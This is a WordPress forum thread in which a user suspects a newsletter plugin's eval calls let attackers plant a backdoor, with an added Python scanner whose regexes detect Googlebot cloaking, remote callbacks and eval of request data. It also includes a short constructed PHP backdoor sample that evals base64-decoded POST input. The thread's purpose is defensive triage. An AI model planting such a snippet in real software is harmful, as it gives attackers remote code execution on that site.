• I’m not directly saying this is true; I’m asking out of legitimate concern.

    I had a site on my development server which only had this plugin installed, as well as one I custom coded for a client. I noticed today that the site was hacked, in that two files were added to the server.

    One file (after decoding it) communicated back to moyaobuvka.ru on each page load (I suggest not visiting this website). It did two things. First, it detected whether the page load was called by Google. If so, it could inject code into the page (possibly links for rank building, a redirect). Second, it then allowed execution of any PHP code sent to any URL as long as certain variables were set.

    I, unfortunately, was unable to view the server logs as the attack came just before the logs were reset at 7am, so I can’t confirm this specifically, but I believe the point of entry was through this plugin, which makes use of the PHP eval command, known to be dangerous and highly suggested to not be used if at all possible.

    I’ve looked at the code, I’m not sure how it would be possible, but seeing the eval command used in two parts of the ‘plugin.php’ file has me feeling uneasy.

    The site runs 3.4.1, is not listed on any search engines, and the admin username would not be easily guessed. Again, the only plugins installed are my own custom plugin, which is not publicly released, and Newsletter 2.5.2.6.

    http://wordpress.org/extend/plugins/newsletter/
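A defender triaging a compromise like the one described above wants a quick way to find PHP files that match the dropped backdoor's traits (Googlebot cloaking, a remote fetch, and eval of request-supplied code) and to separate them from an eval that merely runs owner-authored template code, which is the plugin author's point. The scanner below is an added example, not code from the thread or from the Newsletter plugin; the regexes are my own heuristics, and the sample file contents are constructed, with a placeholder host instead of the real callback domain.

```python
import re
from pathlib import Path

# Heuristic indicators for the behaviour described in the post (my own patterns,
# not a signature taken from the plugin or the dropped files).
PATTERNS = {
    # eval() fed directly from a request variable: attacker-controlled code execution
    "eval_of_request_data": re.compile(
        r"eval\s*\(\s*(?:base64_decode|gzinflate|str_rot13|stripslashes)?\s*\(?\s*"
        r"\$_(?:POST|GET|REQUEST|COOKIE)", re.I),
    # eval() of an obfuscated blob, the usual shape of a dropped backdoor
    "eval_of_decoded_blob": re.compile(
        r"eval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I),
    # branching on a Googlebot user agent: cloaked link injection / redirects
    "googlebot_cloaking": re.compile(r"HTTP_USER_AGENT.{0,80}googlebot", re.I | re.S),
    # fetching content from a remote host on page load
    "remote_callback": re.compile(
        r"(?:curl_init|file_get_contents|fsockopen)\s*\(\s*['\"]https?://", re.I),
    # any eval() at all: worth a manual look, but on its own not proof of compromise
    "any_eval": re.compile(r"\beval\s*\(", re.I),
}


def scan_source(source: str) -> list:
    """Return the names of the indicators that fire on one PHP file's contents."""
    return [name for name, rx in PATTERNS.items() if rx.search(source)]


def scan_tree(root: Path) -> dict:
    """Scan every .php file below root; map path -> fired indicators (hits only)."""
    hits = {}
    for path in root.rglob("*.php"):
        try:
            found = scan_source(path.read_text(errors="replace"))
        except OSError:
            continue  # unreadable file: skip rather than abort the whole scan
        if found:
            hits[str(path)] = found
    return hits


# Constructed sample imitating the described backdoor (placeholder host, not the real one).
SAMPLE_BACKDOOR = """<?php
if (stripos($_SERVER['HTTP_USER_AGENT'], 'googlebot') !== false) {
    echo file_get_contents('http://example.invalid/links.txt');
}
if (isset($_POST['k']) && $_POST['k'] === 'x') { eval(base64_decode($_POST['c'])); }
"""
# Constructed sample of an eval that only runs template code stored by the site owner.
SAMPLE_OWNER_EVAL = "<?php eval('?>' . get_option('nl_template'));"

if __name__ == "__main__":
    print(scan_source(SAMPLE_BACKDOOR))    # all five indicators fire
    print(scan_source(SAMPLE_OWNER_EVAL))  # only 'any_eval'
```

Run `scan_tree(Path("/path/to/wp"))` against a WordPress document root and review the files whose indicator list includes anything beyond `any_eval` first.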

  • Plugin Author Stefano Lissa

    (@satollo)

    The eval is no longer used, even if it is still present in the code, at least for version 3.0.x. About the eval: the code evaluated is the one written by the blog owner, and usually only a few bloggers use it (being coders).

    So I don’t think they hacked the blog via Newsletter. Take a look at the themes; maybe they are still using the old version of timthumb.

    Stefano.

  • The topic ‘Dangerous Plugin Used by Hackers to Corrupt Site?’ is closed to new replies.